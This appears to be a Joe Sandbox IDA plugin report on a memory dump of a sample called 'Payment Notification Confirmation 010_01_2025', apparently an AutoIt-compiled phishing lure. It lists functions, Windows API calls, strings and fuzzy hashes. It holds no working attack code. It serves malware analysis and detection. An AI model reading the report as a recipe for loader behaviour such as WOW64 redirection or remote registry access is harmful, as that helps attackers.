Instruction Fuzzy Hash: 2CF0BEB2A14159BBE7205B639D0EEEF3E7CEFCAB15F000158F605D1090D7A01A01E7B4

Function 00987439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00987452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00987469
GetWindowDC.USER32(?), ref: 00987475
GetPixel.GDI32(00000000,?,?), ref: 00987484
ReleaseDC.USER32(?,00000000), ref: 00987496
GetSysColor.USER32(00000005), ref: 009874B0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: d818bbf355728d3125d286e7ccbf5984e3dedc89a433dc13bc298a699c46a6eb
Instruction ID: f0500ae0201b9956f6086ebb46191f7b0ec3429a50af3608e92fe86d95a6b48d
Opcode Fuzzy Hash: d818bbf355728d3125d286e7ccbf5984e3dedc89a433dc13bc298a699c46a6eb
Instruction Fuzzy Hash: E2018B71818205FFDB50AFA4DD08FAABFB6FB04311F240060F91AA21B1CB311E42AB20

Function 00991874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0099187F
UnloadUserProfile.USERENV(?,?), ref: 0099188B
CloseHandle.KERNEL32(?), ref: 00991894
CloseHandle.KERNEL32(?), ref: 0099189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009918A5
HeapFree.KERNEL32(00000000), ref: 009918AC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 2c1b302e43fbfd195ede36b1d2b5a9bc11ace7b36662f1bf9b88aef0ad7e98ae
Instruction ID: 6ec53d29bacb4cafd31a74a1bdd30caf26b16ac4e1d5f7d5e2dbf303f6e974bf
Opcode Fuzzy Hash: 2c1b302e43fbfd195ede36b1d2b5a9bc11ace7b36662f1bf9b88aef0ad7e98ae
Instruction Fuzzy Hash: 22E01AB681C501BFDB015FA2ED0CD0ABF39FF49B22B108220F22981470CB329420EF50

Function 0099C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00937620: _wcslen.LIBCMT ref: 00937625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0099C6EE
_wcslen.LIBCMT ref: 0099C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0099C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0099C7CA

Strings

0, xrefs: 0099C6AF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 9656444c1fe3448416275045a6115583c7bec1079ff5ffd02889804eb9b8cdbd
Instruction ID: 87286093caea047dff47b35a7f0a9148b57e76800530f919d075309278422e82
Opcode Fuzzy Hash: 9656444c1fe3448416275045a6115583c7bec1079ff5ffd02889804eb9b8cdbd
Instruction Fuzzy Hash: 5751CDB16083419BDB109F6CCC85BABB7E8AF89354F040A29F995E22E0DB64D904DB52

Function 009BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 009BAEA3

Part of subcall function 00937620: _wcslen.LIBCMT ref: 00937625

GetProcessId.KERNEL32(00000000), ref: 009BAF38
CloseHandle.KERNEL32(00000000), ref: 009BAF67

Strings

@, xrefs: 009BAE72
<, xrefs: 009BAE6B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 42a0ca0e7dfd659fd87fce19ec733163d787cbe9f3efddc5c28dad65cb28769e
Instruction ID: 29fad344bd2efdd89efbf870280d9253aab44374151d0d023b0594ad27256964
Opcode Fuzzy Hash: 42a0ca0e7dfd659fd87fce19ec733163d787cbe9f3efddc5c28dad65cb28769e
Instruction Fuzzy Hash: 537177B1A00619DFCB14DF94C584A9EBBF4BF48320F048499E856AB3A2CB74ED41CF91

Function 0099719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00997206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0099723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0099724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009972CF

Strings

DllGetClassObject, xrefs: 00997242

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 7dac540e1cec1cb54c434410e651549677a5bba646cd9d116463bdf0e9f5e7e5
Instruction ID: dec854472bfab851570e564519adbe7fff02a1ffddc3bee49b998e6ebdc500ac
Opcode Fuzzy Hash: 7dac540e1cec1cb54c434410e651549677a5bba646cd9d116463bdf0e9f5e7e5
Instruction Fuzzy Hash: 40416371A24204DFDF15CF98C884B9ABBA9EF44710F1580A9BD159F20ADBB1D944CBA0

Function 00991DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 00993CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00993CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00991E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00991E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00991EA9

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

Strings

ComboBox, xrefs: 00991DF0
ListBox, xrefs: 00991E25

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 5f0b5e0b1a940464ed70cf5d72eb463b21f9d2a21e9a864cfc59acf0490c24c2
Instruction ID: b5d2939a5df68d25f65b325359fe3c9a2c4834c58cb18199f5ed590a59cd73f9
Opcode Fuzzy Hash: 5f0b5e0b1a940464ed70cf5d72eb463b21f9d2a21e9a864cfc59acf0490c24c2
Instruction Fuzzy Hash: 4C213571A00105BFDF14ABA8DD46EFFBBB8EF81350F108519F825A31E0DB7849099A20

Function 009C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009C2F8D
LoadLibraryW.KERNEL32(?), ref: 009C2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009C2FA9
DestroyWindow.USER32(?), ref: 009C2FB1

Strings

SysAnimate32, xrefs: 009C2F68

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 98b8423291415b4f8ab1a7bf0923355f776193ef61710280ad9a4e695a7fe033
Instruction ID: 7b9aef8280b7346ff96608f6c24fe5ce572ec1617f079a45fe23e8c2a09a3fda
Opcode Fuzzy Hash: 98b8423291415b4f8ab1a7bf0923355f776193ef61710280ad9a4e695a7fe033
Instruction Fuzzy Hash: AD21AC71A04209ABEB218FA4DC80FBB7BBDEB99364F10461CFA50D21E0D771DC51A761

Function 00954D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00954D1E,009628E9,?,00954CBE,009628E9,009F88B8,0000000C,00954E15,009628E9,00000002), ref: 00954D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00954DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00954D1E,009628E9,?,00954CBE,009628E9,009F88B8,0000000C,00954E15,009628E9,00000002,00000000), ref: 00954DC3

Strings

CorExitProcess, xrefs: 00954D98
mscoree.dll, xrefs: 00954D86

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ac189f8cda7ec341982afe5c9f3b67dedb865ec889984dc57b942196e3ea44bf
Instruction ID: 6d0e8cfe6df6ea1fe7abca3289b6ca7e1764383ece6561c6ac7aedfce81c184e
Opcode Fuzzy Hash: ac189f8cda7ec341982afe5c9f3b67dedb865ec889984dc57b942196e3ea44bf
Instruction Fuzzy Hash: BAF04474954208BBDB119F91DC49FADBFB9EF84756F044055FD09A6290CB305984DB90

Function 00934E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00934EDD,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00934EAE
FreeLibrary.KERNEL32(00000000,?,?,00934EDD,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00934EA8
kernel32.dll, xrefs: 00934E94

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: a313505c086c325645b5f8803601d293a5017741b52e0efc4ee366d379f944be
Instruction ID: 5a10815b06b5dc1289f0ce295accf5dc3b1a86ab3eae147c9e147bbd880eb5c3
Opcode Fuzzy Hash: a313505c086c325645b5f8803601d293a5017741b52e0efc4ee366d379f944be
Instruction Fuzzy Hash: 8BE0CD75E1D5225BD33117266C18F6F695CAFC1F62F0A0115FD08D2110DB64DD0296A1

Function 00934E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00973CDE,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934E74
FreeLibrary.KERNEL32(00000000,?,?,00973CDE,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00934E6E
kernel32.dll, xrefs: 00934E5B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: d013fc8c5e795cc077a0bbd4706710f95c155a30e8999022a63af0c75a7404ef
Instruction ID: 4d39f9997a877c4a85b0d81d0108faa1775b8e4446c361965ca63652588452f4
Opcode Fuzzy Hash: d013fc8c5e795cc077a0bbd4706710f95c155a30e8999022a63af0c75a7404ef
Instruction Fuzzy Hash: 4ED0C232D1A6215746321B26BC08E8B2E1CAFC1F5530A0114F908A2110CF20CE02DAD1

Function 009A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009A2C05
DeleteFileW.KERNEL32(?), ref: 009A2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009A2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009A2CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009A2CC0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e201a04667104801ea626d37c788c7c2ae4d754c28ebc57b801108402e60b9f2
Instruction ID: 056468b5049bfee4b4ab2632589c25a5d6e9860cc4341feef4cee2e03a903adc
Opcode Fuzzy Hash: e201a04667104801ea626d37c788c7c2ae4d754c28ebc57b801108402e60b9f2
Instruction Fuzzy Hash: F1B15E72D00119ABDF25DBA8CC85FDEBB7DEF89350F1040A6F909E6141EB359A448FA1

Function 009BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009BA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009BA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009BA468
CloseHandle.KERNEL32(?), ref: 009BA63D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 0af1befa68d5f5d524920b36cdd317f65077f0cc25ebc11376fe176fb90b61cd
Instruction ID: ae6500f124015aafe68796bbfdbaa3a1357753ce6937cb02bc2b266a21f1948e
Opcode Fuzzy Hash: 0af1befa68d5f5d524920b36cdd317f65077f0cc25ebc11376fe176fb90b61cd
Instruction Fuzzy Hash: 9FA193B1604700AFD720DF24C986F6AB7E5AF84714F14885DF59A9B292D7B0EC418F92

Function 0096BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009D3700), ref: 0096BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0096BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A01270,000000FF,?,0000003F,00000000,?), ref: 0096BC36
_free.LIBCMT ref: 0096BB7F

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 0096BD4B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: cc835dbb72584fa8f09963444d4ab14b12badcd14983279697adcd804659559e
Instruction ID: 47e302af78e7d1723ed1503b76ef8a7079d101349af3dee185ff16d45f25e10b
Opcode Fuzzy Hash: cc835dbb72584fa8f09963444d4ab14b12badcd14983279697adcd804659559e
Instruction Fuzzy Hash: DE51C772D04209AFCB10EF699C81AEEB7BCEF84350B10466AE554D7291FB749E829B50

Function 0099E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0099CF22,?), ref: 0099DDFD

Part of subcall function 0099DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0099CF22,?), ref: 0099DE16

Part of subcall function 0099E199: GetFileAttributesW.KERNEL32(?,0099CF95), ref: 0099E19A

lstrcmpiW.KERNEL32(?,?), ref: 0099E473
MoveFileW.KERNEL32(?,?), ref: 0099E4AC
_wcslen.LIBCMT ref: 0099E5EB
_wcslen.LIBCMT ref: 0099E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0099E650

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 05a88b0c70f2961c4c5c5adc813051f89282734658658a100f83372e7e377b50
Instruction ID: d0de6ae56d11ca324a9de5f0f8c346474607fdfe1a83b95f1196e69d0b01659e
Opcode Fuzzy Hash: 05a88b0c70f2961c4c5c5adc813051f89282734658658a100f83372e7e377b50
Instruction Fuzzy Hash: F15151B24083459BCB24DBA4D881ADFB3ECAFC4340F04491EF589D3191EF75A688CB66

Function 009BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 009BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009BB6AE,?,?), ref: 009BC9B5
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BC9F1
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA68
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009BBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009BBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009BBB63
RegCloseKey.ADVAPI32(?,?), ref: 009BBBA6
RegCloseKey.ADVAPI32(00000000), ref: 009BBBB3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: b9ac32f7635aa1275a188ee4cccff9b113f8060c328839f59dce30c1afacf8d6
Instruction ID: a7422459bed88badfe08d18443ff64b876f8f8fa66ea81aa382e4dee6bb31dcb
Opcode Fuzzy Hash: b9ac32f7635aa1275a188ee4cccff9b113f8060c328839f59dce30c1afacf8d6
Instruction Fuzzy Hash: ED61BF71608201AFD714DF14C990F6ABBE9FF84318F14895CF4998B2A2CB71ED45CB92

Function 00998BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00998BCD
VariantClear.OLEAUT32 ref: 00998C3E
VariantClear.OLEAUT32 ref: 00998C9D
VariantClear.OLEAUT32(?), ref: 00998D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00998D3B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
